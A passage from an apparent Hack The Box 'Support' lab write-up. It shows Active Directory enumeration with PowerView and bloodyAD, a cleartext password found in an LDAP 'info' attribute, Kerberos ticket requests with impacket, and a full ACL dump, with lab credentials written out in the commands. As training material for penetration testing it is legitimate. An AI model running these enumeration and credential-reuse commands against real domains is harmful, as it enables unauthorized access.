AD Object
From the current scope of operation, further enumeration attempts made from both LDAPDomainDump and BloodHound provided a concrete evidence of the support account being the most valuable target due to its exclusive memberships to both Remote Management Users and Shared Support Accounts groups
While Bloodhound indeed revealed that there is no direct route to the support account from the compromised account, ldap, it would be paramount to inspect the AD object of the support account; CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB
while there are many ways to check ad objects with a compromised domain credential, i will start with a python implementation of powerview
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=ldap@dc.support.htb.ccache powerview 'SUPPORT.HTB/@dc.support.htb' --no-pass -k --dc-ip $IP -q 'Get-DomainObject "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB"'
[2023-10-04 10:44:24] LDAP Signing NOT Enforced!
objectclass : top
person
organizationalPerson
user
cn : support
c : US
l : Chapel Hill
st : NC
postalcode : 27514
distinguishedname : CN=support,CN=Users,DC=support,DC=htb
instancetype : 4
whencreated : 20220528111200.0Z
whenchanged : 20220528111201.0Z
usncreated : 12617
info : Ironside47pleasure40Watchful
memberof : CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
usnchanged : 12630
company : support
streetaddress : Skipper Bowles Dr
name : support
objectguid : {3139a30a-31fa-4530-9ea4-8053b396a7f1}
useraccountcontrol : NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badpwdcount : 0
codepage : 0
countrycode : 0
badpasswordtime : 01/01/1601
lastlogoff : 0
lastlogon : 01/01/1601
pwdlastset : 05/28/2022
primarygroupid : 513
objectsid : S-1-5-21-1677581083-3380853377-188903654-1105
accountexpires : 9223372036854775807
logoncount : 0
samaccountname : support
samaccounttype : 805306368
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 20220528111201.0Z
16010101000000.0ZQuerying for the AD object of the support account reveals an interesting LDAP attribute; info
The LDAP attribute, info, has its value set to what appears to be a CLEARTEXT password string; Ironside47pleasure40Watchful
It must be tested
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-getTGT support.htb/support@dc.support.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: Ironside47pleasure40Watchful
[*] Saving ticket in support@dc.support.htb.ccacheValidation complete and password confirmed for the support account
It was indeed a CLEARTEXT password hard-coded into an LDAP attribute
TGT generated for better OPSEC
ACL
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ bloodyAD -d SUPPORT.HTB -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --host dc.support.htb get search support --resolve-sd
distinguishedname: CN=support,CN=Users,DC=support,DC=htb
accountexpires: 9999-12-31 23:59:59.999999+00:00
badpasswordtime: 1601-01-01 00:00:00+00:00
c: US
cn: support
company: support
dscorepropagationdata: 2022-05-28 11:12:01+00:00; 1601-01-01 00:00:00+00:00
info: Ironside47pleasure40Watchful
instancetype: 4
l: Chapel Hill
lastlogoff: 1601-01-01 00:00:00+00:00
lastlogon: 2023-10-04 09:03:52.093901+00:00
lastlogontimestamp: 2023-10-04 09:03:52.093901+00:00
logoncount: 1
memberof: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb; CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
ntsecuritydescriptor.acl.0.type: == DENIED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: EVERYONE; PRINCIPAL_SELF
ntsecuritydescriptor.acl.0.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.0.objecttype: User-Change-Password
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: RAS and IAS Servers
ntsecuritydescriptor.acl.1.right: READ_PROP
ntsecuritydescriptor.acl.1.objecttype: Group-Membership; Logon-Information; Remote-Access-Information; Account-Restrictions
ntsecuritydescriptor.acl.2.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.2.trustee: Cert Publishers
ntsecuritydescriptor.acl.2.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.2.objecttype: X509-Cert
ntsecuritydescriptor.acl.3.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.3.trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
ntsecuritydescriptor.acl.3.right: READ_PROP
ntsecuritydescriptor.acl.3.objecttype: Token-Groups-Global-And-Universal
ntsecuritydescriptor.acl.4.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.4.trustee: TERMINAL_SERVER_LICENSE_SERVERS
ntsecuritydescriptor.acl.4.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.4.objecttype: Terminal-Server-License-Server; Terminal-Server
ntsecuritydescriptor.acl.5.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.5.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.5.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.5.objecttype: Send-As; Receive-As
ntsecuritydescriptor.acl.6.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.6.trustee: AUTHENTICATED_USERS
ntsecuritydescriptor.acl.6.right: READ_PROP
ntsecuritydescriptor.acl.6.objecttype: Public-Information; Web-Information; Personal-Information; General-Information
ntsecuritydescriptor.acl.7.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.7.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.7.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.7.objecttype: Web-Information; Personal-Information; Phone-and-Mail-Options
ntsecuritydescriptor.acl.8.type: == ALLOWED ==
ntsecuritydescriptor.acl.8.trustee: Domain Admins; ACCOUNT_OPERATORS; LOCAL_SYSTEM
ntsecuritydescriptor.acl.8.right: GENERIC_ALL
ntsecuritydescriptor.acl.8.objecttype: Self
ntsecuritydescriptor.acl.9.type: == ALLOWED ==
ntsecuritydescriptor.acl.9.trustee: AUTHENTICATED_USERS
ntsecuritydescriptor.acl.9.right: READ_SD
ntsecuritydescriptor.acl.9.objecttype: Self
ntsecuritydescriptor.acl.10.type: == ALLOWED ==
ntsecuritydescriptor.acl.10.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.10.right: GENERIC_READ
ntsecuritydescriptor.acl.10.objecttype: Self
ntsecuritydescriptor.acl.11.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.11.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.11.right: READ_PROP
ntsecuritydescriptor.acl.11.objecttype: Account-Restrictions; Remote-Access-Information; Logon-Information; Group-Membership; General-Information
ntsecuritydescriptor.acl.11.inheritedobjecttype: inetOrgPerson
ntsecuritydescriptor.acl.11.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.12.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.12.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.12.right: READ_PROP
ntsecuritydescriptor.acl.12.objecttype: Account-Restrictions; Remote-Access-Information; Logon-Information; Group-Membership; General-Information
ntsecuritydescriptor.acl.12.inheritedobjecttype: User
ntsecuritydescriptor.acl.12.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.13.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.13.trustee: Enterprise Key Admins; Key Admins
ntsecuritydescriptor.acl.13.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.13.objecttype: ms-DS-Key-Credential-Link
ntsecuritydescriptor.acl.13.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.14.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.14.trustee: PRINCIPAL_SELF; CREATOR_OWNER
ntsecuritydescriptor.acl.14.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.14.objecttype: DS-Validated-Write-Computer
ntsecuritydescriptor.acl.14.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.15.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.15.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.15.right: READ_PROP
ntsecuritydescriptor.acl.15.objecttype: Token-Groups
ntsecuritydescriptor.acl.15.inheritedobjecttype: Group; Computer
ntsecuritydescriptor.acl.15.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.16.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.16.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.16.right: READ_PROP
ntsecuritydescriptor.acl.16.objecttype: Token-Groups
ntsecuritydescriptor.acl.16.inheritedobjecttype: User
ntsecuritydescriptor.acl.16.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.17.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.17.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.17.right: WRITE_PROP
ntsecuritydescriptor.acl.17.objecttype: ms-TPM-Tpm-Information-For-Computer
ntsecuritydescriptor.acl.17.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.17.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.18.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.18.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.18.right: GENERIC_READ
ntsecuritydescriptor.acl.18.objecttype: Self
ntsecuritydescriptor.acl.18.inheritedobjecttype: Group; inetOrgPerson
ntsecuritydescriptor.acl.18.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.19.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.19.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.19.right: GENERIC_READ
ntsecuritydescriptor.acl.19.objecttype: Self
ntsecuritydescriptor.acl.19.inheritedobjecttype: User
ntsecuritydescriptor.acl.19.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.20.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.20.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.20.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.20.objecttype: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ntsecuritydescriptor.acl.20.flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
ntsecuritydescriptor.acl.21.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.21.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.21.right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.21.objecttype: Private-Information
ntsecuritydescriptor.acl.21.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.22.type: == ALLOWED ==
ntsecuritydescriptor.acl.22.trustee: Enterprise Admins
ntsecuritydescriptor.acl.22.right: GENERIC_ALL
ntsecuritydescriptor.acl.22.objecttype: Self
ntsecuritydescriptor.acl.22.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.23.type: == ALLOWED ==
ntsecuritydescriptor.acl.23.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.23.right: LIST_CHILD
ntsecuritydescriptor.acl.23.objecttype: Self
ntsecuritydescriptor.acl.23.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.24.type: == ALLOWED ==
ntsecuritydescriptor.acl.24.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.24.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.24.objecttype: Self
ntsecuritydescriptor.acl.24.flags: CONTAINER_INHERIT; INHERITED
name: support
objectcategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
objectclass: top; person; organizationalPerson; user
objectguid: {3139a30a-31fa-4530-9ea4-8053b396a7f1}
objectsid: S-1-5-21-1677581083-3380853377-188903654-1105
postalcode: 27514
primarygroupid: 513
pwdlastset: 2022-05-28 11:12:00.977707+00:00
samaccountname: support
samaccounttype: 805306368
st: NC
streetaddress: Skipper Bowles Dr
usnchanged: 82013
usncreated: 12617
useraccountcontrol: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
whenchanged: 2023-10-04 09:03:52+00:00
whencreated: 2022-05-28 11:12:00+00:00much like the python implementation of powerview, BloodyAD can be used to enumerate the AD object. Additionally, it can also list the resolved ACL of a given AD object